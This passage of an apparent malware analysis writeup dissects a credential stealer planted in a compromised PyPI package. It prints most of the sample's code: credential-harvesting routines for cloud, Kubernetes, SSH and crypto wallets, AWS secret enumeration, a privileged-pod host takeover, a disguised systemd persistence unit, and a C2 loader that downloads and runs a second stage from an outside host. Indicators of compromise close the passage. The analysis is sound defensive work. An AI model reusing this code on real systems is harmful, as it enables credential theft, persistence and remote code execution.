run('curl -s http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI} 2>/dev/null || true')
run('curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || true')Google Cloud
for h in homes+['/root']:
walk([h+'/.config/gcloud'],4,lambda fp,fn:True)
emit('/root/.config/gcloud/application_default_credentials.json')
run('env | grep -i google; env | grep -i gcloud')
run('cat $GOOGLE_APPLICATION_CREDENTIALS 2>/dev/null || true')Microsoft Azure
for h in homes+['/root']:
walk([h+'/.azure'],3,lambda fp,fn:True)
run('env | grep -i azure')Kubernetes
Kubeconfigs, in-cluster control-plane paths, mounted service-account material, ad-hoc secret file discovery, env scraping, and a broad kubectl pull if the binary exists.
for h in homes+['/root']:
emit(h+'/.kube/config')
emit('/etc/kubernetes/admin.conf')
emit('/etc/kubernetes/kubelet.conf')
emit('/etc/kubernetes/controller-manager.conf')
emit('/etc/kubernetes/scheduler.conf')
emit('/var/run/secrets/kubernetes.io/serviceaccount/token')
emit('/var/run/secrets/kubernetes.io/serviceaccount/ca.crt')
emit('/var/run/secrets/kubernetes.io/serviceaccount/namespace')
emit('/run/secrets/kubernetes.io/serviceaccount/token')
emit('/run/secrets/kubernetes.io/serviceaccount/ca.crt')
run('find /var/secrets /run/secrets -type f 2>/dev/null | xargs -I{} sh -c \'echo "=== {} ==="; cat "{}" 2>/dev/null\'')
run('env | grep -i kube; env | grep -i k8s')
run('kubectl get secrets --all-namespaces -o json 2>/dev/null || true')Docker and container registry
for h in homes+['/root']:
emit(h+'/.docker/config.json')
emit('/kaniko/.docker/config.json')
emit('/root/.docker/config.json')Developer secrets, vaults, and shell histories
for h in homes+['/root']:
emit(h+'/.npmrc')
emit(h+'/.vault-token')
emit(h+'/.netrc')
emit(h+'/.lftp/rc')
emit(h+'/.msmtprc')
emit(h+'/.my.cnf')
emit(h+'/.pgpass')
emit(h+'/.mongorc.js')
for hist in ['/.bash_history','/.zsh_history','/.sh_history','/.mysql_history','/.psql_history','/.rediscli_history']:
emit(h+hist)Databases, LDAP, and mail server config
emit('/var/lib/postgresql/.pgpass')
emit('/etc/mysql/my.cnf')
emit('/etc/redis/redis.conf')
emit('/etc/postfix/sasl_passwd')
emit('/etc/msmtprc')
emit('/etc/ldap/ldap.conf')
emit('/etc/openldap/ldap.conf')
emit('/etc/ldap.conf')
emit('/etc/ldap/slapd.conf')
emit('/etc/openldap/slapd.conf')
run('env | grep -iE "(DATABASE|DB_|MYSQL|POSTGRES|MONGO|REDIS|VAULT)"')WireGuard
walk(['/etc/wireguard'],1,lambda fp,fn:fn.endswith('.conf'))
run('wg showconf all 2>/dev/null || true')Helm, Terraform, and CI
for h in homes+['/root']:
walk([h+'/.helm'],3,lambda fp,fn:True)
for ci in ['terraform.tfvars','.gitlab-ci.yml','.travis.yml','Jenkinsfile','.drone.yml','Anchor.toml','ansible.cfg']:
emit(ci)
walk(all_roots,4,lambda fp,fn:fn.endswith('.tfvars'))
walk(all_roots,4,lambda fp,fn:fn=='terraform.tfstate')TLS keys and certificates on disk
walk(['/etc/ssl/private'],1,lambda fp,fn:fn.endswith('.key'))
walk(['/etc/letsencrypt'],4,lambda fp,fn:fn.endswith('.pem'))
walk(all_roots,5,lambda fp,fn:os.path.splitext(fn)[1] in {'.pem','.key','.p12','.pfx'})Slack, Discord, and loose API-key greps
run('grep -r "hooks.slack.com\|discord.com/api/webhooks" . 2>/dev/null | head -20')
run('grep -rE "api[_-]?key|apikey|api[_-]?secret|access[_-]?token" . --include="*.env*" --include="*.json" --include="*.yml" --include="*.yaml" 2>/dev/null | head -50')Cryptocurrency wallets
Coin daemon configs, wallet files, L1/L2 keystores, Solana keypairs, validator paths, and Anchor-style JSON hunts.
for h in homes+['/root']:
for coin in ['/.bitcoin/bitcoin.conf','/.litecoin/litecoin.conf','/.dogecoin/dogecoin.conf','/.zcash/zcash.conf','/.dashcore/dash.conf','/.ripple/rippled.cfg','/.bitmonero/bitmonero.conf']:
emit(h+coin)
walk([h+'/.bitcoin'],2,lambda fp,fn:fn.startswith('wallet') and fn.endswith('.dat'))
walk([h+'/.ethereum/keystore'],1,lambda fp,fn:True)
walk([h+'/.cardano'],3,lambda fp,fn:fn.endswith('.skey') or fn.endswith('.vkey'))
walk([h+'/.config/solana'],3,lambda fp,fn:True)
for sol in ['/validator-keypair.json','/vote-account-keypair.json','/authorized-withdrawer-keypair.json','/stake-account-keypair.json','/identity.json','/faucet-keypair.json']:
emit(h+sol)
walk([h+'/ledger'],3,lambda fp,fn:fn.endswith('.json') or fn.endswith('.bin'))
for sol_dir in ['/home/sol','/home/solana','/opt/solana','/solana','/app','/data']:
emit(sol_dir+'/validator-keypair.json')
walk(['.'],8,lambda fp,fn:fn in {'id.json','keypair.json'} or (fn.endswith('-keypair.json') and 'keypair' in fn) or (fn.startswith('wallet') and fn.endswith('.json')))
walk(['.anchor','./target/deploy','./keys'],5,lambda fp,fn:fn.endswith('.json'))
run('env | grep -i solana')
run('grep -r "rpcuser\|rpcpassword\|rpcauth" /root /home 2>/dev/null | head -50')Host identity and SSH login trail
emit('/etc/passwd')
emit('/etc/shadow')
run('cat /var/log/auth.log 2>/dev/null | grep Accepted | tail -200')
run('cat /var/log/secure 2>/dev/null | grep Accepted | tail -200')The breadth of this thing tells you a lot about the intended victim profile. The author anticipates servers, CI runners, Kubernetes pods, cloud workstations, and cryptocurrency. The /etc/shadow grab and successful-SSH-login tails are reconnaissance and lateral-movement fuel.
The harvester runs every collector unconditionally and relies on empty except blocks for silent failure. If a path doesn’t exist, it moves on. If a command times out, it moves on.
AWS SigV4 API Abuse
After the file-grinding phase, the harvester goes further than most credential stealers I’ve seen in supply-chain attacks. It embeds a full AWS Signature Version 4 signing routine using only the standard library:
import urllib.request,urllib.error,json,hmac,hashlib,datetime,base64
def aws_req(method,service,region,path,payload,extra_headers,access_key,secret_key,token):
host=f'{service}.{region}.amazonaws.com'
t=datetime.datetime.utcnow()
amzdate=t.strftime('%Y%m%dT%H%M%SZ')
datestamp=t.strftime('%Y%m%d')
canonical_uri=path
canonical_querystring=''
canonical_headers=f'host:{host}\nx-amz-date:{amzdate}\n'
signed_headers='host;x-amz-date'
if token:
canonical_headers+=f'x-amz-security-token:{token}\n'
signed_headers+=';x-amz-security-token'
payload_hash=hashlib.sha256(payload.encode()).hexdigest()
canonical_request=f'{method}\n{canonical_uri}\n{canonical_querystring}\n{canonical_headers}\n{signed_headers}\n{payload_hash}'
credential_scope=f'{datestamp}/{region}/{service}/aws4_request'
string_to_sign=f'AWS4-HMAC-SHA256\n{amzdate}\n{credential_scope}\n'+hashlib.sha256(canonical_request.encode()).hexdigest()
def sign(key,msg):return hmac.new(key,msg.encode(),'sha256').digest()
signing_key=sign(sign(sign(sign(f'AWS4{secret_key}'.encode(),datestamp),region),service),'aws4_request')
signature=hmac.new(signing_key,string_to_sign.encode(),'sha256').hexdigest()
auth=f'AWS4-HMAC-SHA256 Credential={access_key}/{credential_scope}, SignedHeaders={signed_headers}, Signature={signature}'
hdrs={'x-amz-date':amzdate,'Authorization':auth,'x-amz-content-sha256':payload_hash}
if token:hdrs['x-amz-security-token']=token
hdrs.update(extra_headers)
req=urllib.request.Request(f'https://{host}{path}',data=payload.encode() if payload else None,headers=hdrs,method=method)
try:
with urllib.request.urlopen(req,timeout=10) as r:return json.loads(r.read())
except:return {}If AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY are present in the environment, the harvester:
- Emits the raw credentials to stdout.
- Attempts IMDSv2 (PUT token request + role credential fetch) to refresh or replace keys with instance-profile credentials.
- Calls Secrets Manager (
ListSecrets) to enumerate secret metadata. - Calls SSM (
DescribeParameters) to enumerate parameter store entries.
There’s a bug here worth noting. The follow-on GetSecretValue loop passes an empty string as the HTTP body:
for s in sm.get('SecretList',sm.get('SecretList',[])):
sid=s.get('ARN','')
sv=aws_req('POST','secretsmanager',REG,'/','',
{'Content-Type':'application/x-amz-json-1.1','X-Amz-Target':'secretsmanager.GetSecretValue',
'Content-Type':'application/x-amz-json-1.1'},AK,SK,ST)A working GetSecretValue call needs a JSON payload like {"SecretId": "<ARN>"}. An empty body should yield a SerializationException. There’s also a duplicated Content-Type key in the header dict (harmless since both values match). Maybe this is a sign that the payload was not vibe coded given the human-like tendency for errors, but there’s nothing definitive proving it one way or the other.
The practical implication is that even with valid keys, the sample can enumerate secret metadata via ListSecrets but probably can’t retrieve actual secret values without fixing that request shape. Whether that’s sloppiness, vibe-coded quirks, or just unfinished, the intent is clear either way.
Kubernetes Cluster Pivot
If a pod service-account token is present at the expected mount path, the sample pivots to the Kubernetes API. It builds an in-cluster client with a notable TLS fallback:
def k8s_get(path):
import ssl
ctx=ssl.create_default_context(cafile=K8S_CA) if os.path.exists(K8S_CA) else ssl._create_unverified_context()
req=urllib.request.Request(api+path,headers=hdrs)
try:
with urllib.request.urlopen(req,context=ctx,timeout=10) as r:return json.loads(r.read())
except:return {}
def k8s_post(path,data):
import ssl
ctx=ssl.create_default_context(cafile=K8S_CA) if os.path.exists(K8S_CA) else ssl._create_unverified_context()
req=urllib.request.Request(api+path,data=json.dumps(data).encode(),headers=hdrs,method='POST')
try:
with urllib.request.urlopen(req,context=ctx,timeout=30) as r:return json.loads(r.read())
except:return {}When the CA path is missing, k8s_get/k8s_post fall back to ssl._create_unverified_context(). The first move is a horizontal sweep where the sample fetches /api/v1/secrets (cluster-wide), then lists all namespaces and pulls /api/v1/namespaces/{ns}/secrets for each one. In misconfigured clusters, a single service-account token can read secrets across every namespace, so these can be extremely high value.
Then, for each node in the cluster, the sample builds a privileged Pod manifest:
pod_manifest={
'apiVersion':'v1','kind':'Pod',
'metadata':{'name':f'node-setup-{node_name[:35]}','namespace':'kube-system'},
'spec':{
'nodeName':node_name,
'hostPID':True,'hostNetwork':True,
'tolerations':[{'operator':'Exists'}],
'containers':[{
'name':'setup',
'image':'alpine:latest',
'command':['sh','-c',drop_cmd],
'securityContext':{'privileged':True},
'volumeMounts':[{'name':'host','mountPath':'/host'}]
}],
'volumes':[{'name':'host','hostPath':{'path':'/'}}],
'restartPolicy':'Never'
}
}
k8s_post('/api/v1/namespaces/kube-system/pods',pod_manifest)Everything about this spec is designed for maximum host access: hostPID, hostNetwork, a hostPath volume mounting / from the node to /host in the container, tolerations: [{"operator": "Exists"}] to schedule on any node including tainted ones, and securityContext: {"privileged": true}. The container’s shell command writes the decoded C2 stub (more on this in a moment) to /host/root/.config/sysmon/sysmon.py, discovers the Python binary via chroot /host which python3, and installs a systemd user unit called “System Telemetry Service.” That’s persistence on the host OS rather than inside a container.
One static-analysis finding worth flagging: PERSIST_B64 is only assigned inside the if os.path.exists(SA_TOKEN_PATH) branch (the K8s path). The local persistence block that follows uses base64.b64decode(PERSIST_B64) outside that branch:
PERSIST_B64='aW1wb3J0IHVybGxpYi5yZXF1...[snip]...'
nodes=k8s_get('/api/v1/nodes')The assignment sits alongside the K8s node loop. Then, after that whole if os.path.exists(SA_TOKEN_PATH): block closes, the unconditional local-install path runs:
home=os.path.expanduser('~')
script_dir=os.path.join(home,'.config','sysmon')
script_path=os.path.join(script_dir,'sysmon.py')
unit_dir=os.path.join(home,'.config','systemd','user')
unit_path=os.path.join(unit_dir,'sysmon.service')
if not os.path.exists(script_path):
os.makedirs(script_dir,exist_ok=True)
os.makedirs(unit_dir,exist_ok=True)
try:
with open(script_path,'wb') as f:f.write(base64.b64decode(PERSIST_B64))
os.chmod(script_path,0o700)
import shutil
py=shutil.which('python3') or shutil.which('python')
if py:
unit=f'[Unit]\nDescription=System Telemetry Service\nAfter=network.target\nStartLimitIntervalSec=0\n\n[Service]\nType=simple\nExecStart={py} {script_path}\nRestart=always\nRestartSec=10\nKillMode=process\nStandardOutput=null\nStandardError=null\n\n[Install]\nWantedBy=multi-user.target\n'
with open(unit_path,'w') as f:f.write(unit)
subprocess.run(['systemctl','--user','daemon-reload'],capture_output=True,timeout=5)
subprocess.run(['systemctl','--user','enable','--now','sysmon.service'],capture_output=True,timeout=5)
except:passOn a machine with no in-cluster token file, PERSIST_B64 is never defined, so that line raises NameError, swallowed by the bare except. The local “install sysmon for the interactive user” path silently fails on vanilla workstations and CI runners that aren’t running in a Kubernetes pod. The privileged-pod path still targets root on nodes.
Systemd Dead Drop C2
Finally, the command & control module. It’s super straightforward.
The innermost decoded blob is a stub loader for whatever the operator chooses for the second stage.
def g():
try:
req = urllib.request.Request(C_URL, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=10) as r:
link = r.read().decode('utf-8').strip()
return link if link.startswith("http") else None
except:
return None
if __name__ == "__main__":
time.sleep(300)
while True:
l = g()
prev = ""
if os.path.exists(STATE):
try:
with open(STATE, "r") as f:
prev = f.read().strip()
except:
pass
if l and l != prev and "youtube.com" not in l:
e(l)
time.sleep(3000)The stub sleeps for 300 seconds before entering its main loop. That front-loaded sleep is consistent with simple sandbox timing evasion.
After the sleep, the loop runs on a 3000-second (50-minute) interval. Each iteration fetches the response body from checkmarx[.]zone/raw (yes, another unrelated vendor name being squatted for infrastructure camouflage) and interprets it as a URL if it starts with http. It compares against a state file at /tmp/.pg_state to avoid re-downloading the same payload. If the URL is new and doesn’t contain youtube.com, it downloads the target and launches it:
def e(l):
try:
urllib.request.urlretrieve(l, TARGET)
os.chmod(TARGET, 0o755)
subprocess.Popen([TARGET], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, start_new_session=True)
with open(STATE, "w") as f:
f.write(l)
except:
passThe YouTube thing is strange but probably used to filter out junk URLs from the downloading of the second stage.
In any case, the stub downloads to /tmp/pglog, marks it executable, Popens it detached in a new session. The state file prevents re-execution of the same binary on every poll.
This is two-stage command and control. The compromised PyPI package handles credential theft and initial persistence. The remote paste URL can rotate the actual second-stage binary without republishing the wheel. The operator can deploy entirely different malware families over time, using the PyPI compromise as a beachhead.
The systemd unit that hosts this stub is named “System Telemetry Service” with the path ~/.config/sysmon/sysmon.py, which is likely an attmept to blend in with nominal system monitoring files.
Conclusion
In many ways, this is a classic dime-a-dozen credential stealer. In other ways, there’s some surprising stuff in here. Hybrid encryption in a credential stealer is interesting as most cred stealers do not go through the trouble of implementing a crypto system you’d commonly see in ransomware (why encrypt at all when you only intend to steal the creds rather than ransom them?). The same goes for the extended exploitation modules, which target specific K8s and AWS persistence mechanisms. Extensive technical targeting of cloud services like this is uncommon for the average cred stealer but speaks to the malware developer’s intended victim profile.
IoCs are below. ✌️
References
- Alex Birsan quote
- Python
sitemodule documentation - PEP 302 - New Import Hooks
- PyPI Inspector
- LiteLLM GitHub Repo Issue
Indicators of compromise
| Type | Indicator | Notes |
|---|---|---|
| SHA256 | 71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238 | SHA256 of litellm_init[.]pth sample. |
| PyPI package | litellm | Supply-chain compromise via published wheels for version 1.82.8 |
| Wheel / site-packages file | litellm_init.pth | Path hook under site-packages |
| Network (exfil) | POST to hxxps://models[.]litellm[.]cloud/ | Encrypted archive uploaded as application/octet-stream, sample uses header X-Filename: tpcp.tar.gz. |
| Archive / header | tpcp.tar.gz | Filename on the HTTP upload (tarball containing payload.enc and session.key.enc in the analyzed flow) |
| Network (stage-2 bootstrap) | hxxps://checkmarx[.]zone/raw | Loader polls this URL, body treated as a second-stage download link. User-Agent in sample: Mozilla/5.0. |
| Filesystem | ~/.config/sysmon/sysmon.py | Dropped persistence script (mode 0700 in sample), also written under host /root via privileged K8s pod path. |
| Filesystem | ~/.config/systemd/user/sysmon.service | systemd user unit. Unit description string in sample: System Telemetry Service. |
| Filesystem | /tmp/pglog | Second-stage binary dropped and executed (chmod 0755). |
| Filesystem | /tmp/.pg_state | Stores last seen second-stage URL to avoid re-downloading the same link. |
| Kubernetes | Pod name prefix node-setup-, namespace kube-system | Privileged pod spec with hostPath / → /host, hostPID, hostNetwork, image alpine:latest in analyzed sample. |
| Process / behavior | python -c with base64 + exec, detached Popen | Initial .pth execution pattern. stdio redirected to DEVNULL. |
| Process / behavior | openssl enc -aes-256-cbc, openssl pkeyutl -encrypt, openssl rand | Local encryption of collected material before exfil. |
| Process / behavior | curl POST of tarball | Outbound upload of encrypted package. |
